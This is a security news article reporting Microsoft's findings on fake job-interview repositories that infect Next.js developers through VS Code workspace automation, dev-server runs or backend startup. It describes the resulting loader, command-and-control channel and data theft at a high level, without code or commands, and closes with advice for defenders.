Security Fake 'interview' repos lure Next.js devs into running secret-stealing malware Come for the coding test, stay for the C2 traffic Connor Jones Wed 25 Feb 2026 // 16:51 UTC Next.js developers are once again in the crosshairs as hackers seed malicious repositories disguised as legitimate projects, according to Microsoft, which said a limited set of those repos were directly tied to observed compromises. Microsoft said the repositories use different methods to execute on developers’ machines, but all lead to the same outcome: in-memory execution of malicious JavaScript. All of the execution paths identified by its research team are designed to trigger during the Next.js devs' normal working routine. One, for example, abuses Visual Studio Code's workspace automation to load files as soon as the dev opens and trusts the project. In these cases, the variants tend to retrieve a JavaScript loader from Vercel and execute it using Node.js , then begin beaconing to attacker-controlled command-and-control (C2) infrastructure for further tasking. Other paths involve the targeted developers running the project's development server either directly or via npm run dev, where malicious logic embedded in trojanized assets or modified libraries (such as altered frontend files) retrieves and executes the loader. Others rely on victims starting the application's backend, triggering preloaded logic hidden in backend modules during server initialization or module import. Regardless of the path taken, the end result is always to register the affected device, run the JavaScript loader, and establish a connection with the attacker's C2 infrastructure. Using a separate C2 IP address and API set handed off by the initial stage, the controller retrieves a messages[] array of JavaScript tasks and executes them in memory using a separate Node interpreter to reduce on-disk artifacts. This process also allows for data exfiltration. On developer machines, this could include anything from personal data to source code, secrets, or cloud resources. Microsoft said the controller is capable of rotating its identifiers to prevent anti-malware solutions and human defenders from identifying patterns of suspicious activity, in addition to receiving the attacker's instructions. Workaholic open source developers need to take breaks Self-propagating worm fuels latest npm supply chain compromise Devs are writing VS Code extensions that blab secrets by the bucketload AWS Lambda loves charging for idle time: Vercel claims it found a way to dodge the bill The controller will also obey kill-switch or shutdown commands, track the processes it spawns to prevent the victim from suspecting anything is awry based on performance issues, and report error telemetry, allowing attackers to tweak the commands that fail. The projects are disseminated by miscreants under the guise that they are used as part of the hiring process , requiring developers to complete tasks related to job applications . And while it's difficult to imagine that targeted devs would complete these interview assessment tasks on a corporate machine, Microsoft warned that doing so could open up an organization to a wider compromise. It added: "The key takeaway is that defenders should treat developer workflows as a primary attack surface and prioritize visibility into unusual Node execution, unexpected outbound connections, and follow‑on discovery or upload behavior originating from development machines." ® Share More about Cybercrime JavaScript Microsoft More like these × More about Cybercrime JavaScript Microsoft Narrower topics Active Directory Azure Bing BSoD Excel Exchange Server HoloLens Internet Explorer LinkedIn Microsoft 365 Microsoft Build Microsoft Edge Microsoft Fabric Microsoft Ignite Microsoft Office Microsoft Surface Microsoft Teams NCSC .NET Office 365 OS/2 Outlook Patch Tuesday PHP Pluton SharePoint Skype SQL Server Visual Studio Visual Studio Code Windows Windows 10 Windows 11 Windows 7 Windows 8 Windows Server Windows Server 2003 Windows Server 2008 Windows Server 2012 Windows Server 2013 Windows Server 2016 Windows Subsystem for Linux Windows XP Xbox Xbox 360 Broader topics Bill Gates Programming Language Security More about Share POST A COMMENT More about Cybercrime JavaScript Microsoft More like these × More about Cybercrime JavaScript Microsoft Narrower topics Active Directory Azure Bing BSoD Excel Exchange Server HoloLens Internet Explorer LinkedIn Microsoft 365 Microsoft Build Microsoft Edge Microsoft Fabric Microsoft Ignite Microsoft Office Microsoft Surface Microsoft Teams NCSC .NET Office 365 OS/2 Outlook Patch Tuesday PHP Pluton SharePoint Skype SQL Server Visual Studio Visual Studio Code Windows Windows 10 Windows 11 Windows 7 Windows 8 Windows Server Windows Server 2003 Windows Server 2008 Windows Server 2012 Windows Server 2013 Windows Server 2016 Windows Subsystem for Linux Windows XP Xbox Xbox 360 Broader topics Bill Gates Programming Language Security TIP US OFF Send us news